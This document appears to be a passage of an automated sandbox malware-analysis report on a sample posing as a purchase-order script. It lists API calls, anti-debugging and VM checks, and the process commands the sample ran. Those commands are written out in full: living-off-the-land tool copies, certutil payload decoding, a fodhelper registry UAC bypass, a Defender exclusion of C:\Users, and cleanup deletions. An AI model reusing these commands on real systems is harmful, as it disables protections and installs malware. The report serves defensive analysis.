Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF789BC35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,		4_2_00007FF789BC35B8
Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF789BC1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,		4_2_00007FF789BC1560
Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF789BE7B4C FindFirstFileW,FindNextFileW,FindClose,		4_2_00007FF789BE7B4C
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF789BD823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,		6_2_00007FF789BD823C
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF789BD2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,		6_2_00007FF789BD2978
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF789BC35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,		6_2_00007FF789BC35B8
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF789BC1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,		6_2_00007FF789BC1560
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF789BE7B4C FindFirstFileW,FindNextFileW,FindClose,		6_2_00007FF789BE7B4C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEB5E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,		25_2_00007FF67DEB5E58
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF119F8 #359,FindFirstFileW,FindNextFileW,FindClose,		25_2_00007FF67DF119F8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEBDBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose,		25_2_00007FF67DEBDBC0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF11B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359,		25_2_00007FF67DF11B04
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEF3674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359,		25_2_00007FF67DEF3674
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEBD4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle,		25_2_00007FF67DEBD4A4
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE7D440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,		25_2_00007FF67DE7D440
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEBB3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,		25_2_00007FF67DEBB3D8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF16F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357,		25_2_00007FF67DF16F80
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF110C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357,		25_2_00007FF67DF110C4
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF13100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357,		25_2_00007FF67DF13100
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEAC6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree,		25_2_00007FF67DEAC6F8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF1234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose,		25_2_00007FF67DF1234C
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_1B9FBB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,		28_2_1B9FBB30
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_1B9FC34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,		28_2_1B9FC34D
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_1BA0C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,		28_2_1BA0C291
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_1BA09AF5 FindFirstFileW,		28_2_1BA09AF5
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_1B9F880C FindFirstFileW,FindNextFileW,FindClose,		28_2_1B9F880C
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_1B9F783C FindFirstFileW,FindNextFileW,		28_2_1B9F783C
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_1B9F9665 FindFirstFileW,FindNextFileW,FindClose,FindClose,		28_2_1B9F9665
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_1B9FBD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,		28_2_1B9FBD37
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_1BA3E879 FindFirstFileExA,		28_2_1BA3E879
Source: C:\Users\Public\alpha.exe	Code function: 29_2_00007FF789BD823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,		29_2_00007FF789BD823C
Source: C:\Users\Public\alpha.exe	Code function: 29_2_00007FF789BD2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,		29_2_00007FF789BD2978
Source: C:\Users\Public\alpha.exe	Code function: 29_2_00007FF789BC35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,		29_2_00007FF789BC35B8
Source: C:\Users\Public\alpha.exe	Code function: 29_2_00007FF789BC1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,		29_2_00007FF789BC1560
Source: C:\Users\Public\alpha.exe	Code function: 29_2_00007FF789BE7B4C FindFirstFileW,FindNextFileW,FindClose,		29_2_00007FF789BE7B4C
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_029A5878 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,		36_2_029A5878
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_2106C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,		36_2_2106C34D
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_21069253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,		36_2_21069253
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_2107C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,		36_2_2107C291
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_21069665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,		36_2_21069665
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_2106880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,		36_2_2106880C
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_2106783C FindFirstFileW,FindNextFileW,		36_2_2106783C
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_210AE879 FindFirstFileExA,		36_2_210AE879
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_2106BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,		36_2_2106BB30
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_21079AF5 FindFirstFileW,FindNextFileW,FindNextFileW,		36_2_21079AF5
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_2106BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,		36_2_2106BD37

Source: C:\Users\Public\Libraries\Kpeyvroh.PIF

Code function: 36_2_21067C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

36_2_21067C97

Source: C:\Users\Public\kn.exe

Code function: 25_2_00007FF67DEF511C GetSystemInfo,CryptFindOIDInfo,#359,CreateFileW,GetLastError,#357,#359,GetFileSize,#357,CreateFileMappingW,GetLastError,#359,#357,LocalAlloc,BCryptCreateHash,#360,MapViewOfFile,BCryptHashData,#360,UnmapViewOfFile,LocalAlloc,GetLastError,#357,GetLastError,BCryptFinishHash,#360,LocalAlloc,LocalFree,#357,UnmapViewOfFile,CloseHandle,CloseHandle,BCryptDestroyHash,#360,LocalFree,LocalFree,

25_2_00007FF67DEF511C

Source: C:\Users\Public\xkn.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\Public\xkn.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: Kpeyvroh.PIF, 00000026.00000002.2504569132.0000000000652000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllZ
Source: Kpeyvroh.PIF, 00000024.00000002.2419249499.000000000071E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllQ
Source: xkn.exe, 00000009.00000002.2186803766.0000015A4B040000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: sppsvc.pif, 0000001C.00000003.3094405950.0000000000796000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3094405950.0000000000781000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: xkn.exe, 00000009.00000002.2186803766.0000015A4B040000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}R

Source: C:\Users\Public\Libraries\sppsvc.pif	API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\sppsvc.pif	API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\sppsvc.pif	API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	API call chain: ExitProcess graph end node

Source: C:\Users\Public\xkn.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Source: C:\Users\Public\alpha.exe

Code function: 4_2_00007FF789BE63FC GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,

4_2_00007FF789BE63FC

Source: C:\Users\Public\ger.exe

Code function: 14_2_00007FF65588A29C memset,SearchPathW,CreateFileW,GetFileSize,ReadFile,SetFilePointer,CharNextW,IsCharAlphaNumericW,StrToIntW,IsCharAlphaNumericW,StrToIntW,CharNextW,GetLastError,OutputDebugStringW,CloseHandle,

14_2_00007FF65588A29C

Source: C:\Users\Public\Libraries\sppsvc.pif

Code function: 28_2_1B9F6A63 LoadLibraryA,GetProcAddress,

28_2_1B9F6A63

Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_1BA332B5 mov eax, dword ptr fs:[00000030h]		28_2_1BA332B5
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_210A32B5 mov eax, dword ptr fs:[00000030h]		36_2_210A32B5
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_029E53AD mov eax, dword ptr fs:[00000030h]		36_2_029E53AD

Source: C:\Users\Public\alpha.exe

Code function: 4_2_00007FF789BD823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,

4_2_00007FF789BD823C

Source: C:\Users\Public\xkn.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug

Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF789BD8FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		4_2_00007FF789BD8FA4
Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF789BD93B0 SetUnhandledExceptionFilter,		4_2_00007FF789BD93B0
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF789BD8FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		6_2_00007FF789BD8FA4
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF789BD93B0 SetUnhandledExceptionFilter,		6_2_00007FF789BD93B0
Source: C:\Users\Public\ger.exe	Code function: 14_2_00007FF65588ED50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		14_2_00007FF65588ED50
Source: C:\Users\Public\ger.exe	Code function: 14_2_00007FF65588F050 SetUnhandledExceptionFilter,		14_2_00007FF65588F050
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF453E0 SetUnhandledExceptionFilter,		25_2_00007FF67DF453E0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF44E18 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		25_2_00007FF67DF44E18
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_1BA2BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		28_2_1BA2BB22
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_1BA24B47 SetUnhandledExceptionFilter,		28_2_1BA24B47
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_1BA249F8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		28_2_1BA249F8
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_1BA249F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		28_2_1BA249F9
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_1BA24FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		28_2_1BA24FDC
Source: C:\Users\Public\alpha.exe	Code function: 29_2_00007FF789BD8FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		29_2_00007FF789BD8FA4
Source: C:\Users\Public\alpha.exe	Code function: 29_2_00007FF789BD93B0 SetUnhandledExceptionFilter,		29_2_00007FF789BD93B0
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_210949F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		36_2_210949F9
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_2109BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		36_2_2109BB22
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_21094B47 SetUnhandledExceptionFilter,		36_2_21094B47
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_21094FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		36_2_21094FDC

Source: C:\Users\Public\xkn.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
Source: C:\Users\Public\xkn.exe	Process created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "			Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "			Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "			Jump to behavior

Source: C:\Windows\System32\extrac32.exe

File created: C:\Users\Public\kn.exe

Jump to dropped file

Source: C:\Windows\System32\extrac32.exe

File created: C:\Users\Public\alpha.exe

Jump to dropped file

Source: C:\Users\Public\Libraries\Kpeyvroh.PIF

Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe

36_2_210720F7

Source: C:\Users\Public\kn.exe

Code function: 25_2_00007FF67DEF7024 GetModuleHandleW,GetProcAddress,#356,#357,CloseHandle,LocalFree,LocalFree,LocalFree,ImpersonateLoggedOnUser,#356,EqualSid,#357,LogonUserExW,GetLastError,ImpersonateLoggedOnUser,#356,#359,RevertToSelf,#356,

25_2_00007FF67DEF7024

Source: C:\Users\Public\Libraries\sppsvc.pif

Code function: 28_2_1BA09627 mouse_event,

28_2_1BA09627

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe C:\\Users\\Public\\ger.exe			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Purchase Order is approved26042024.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Libraries\sppsvc.pif C:\Users\Public\Libraries\sppsvc.pif			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del "C:\Users\Public\sppsvc.rtf" / A / F / Q / S			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del "C:\Users\Public\ger.exe" / A / F / Q / S			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S			Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe			Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\reg.exe C:\\Users\\Public\\ger.exe			Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"			Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "			Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe			Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Purchase Order is approved26042024.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe

Source: C:\Users\Public\alpha.exe

Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe

Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe c:\\users\\public\\alpha /c c:\\users\\public\\xkn.exe -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn.exe -windowstyle hidden -command "add-mppreference -exclusionpath c:\users "' ; start fodhelper.exe "
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\xkn.exe c:\\users\\public\\xkn.exe -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn.exe -windowstyle hidden -command "add-mppreference -exclusionpath c:\users "' ; start fodhelper.exe "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe c:\\users\\public\\alpha /c c:\\users\\public\\xkn.exe -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn.exe -windowstyle hidden -command "add-mppreference -exclusionpath c:\users "' ; start fodhelper.exe "			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\xkn.exe c:\\users\\public\\xkn.exe -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn.exe -windowstyle hidden -command "add-mppreference -exclusionpath c:\users "' ; start fodhelper.exe "			Jump to behavior
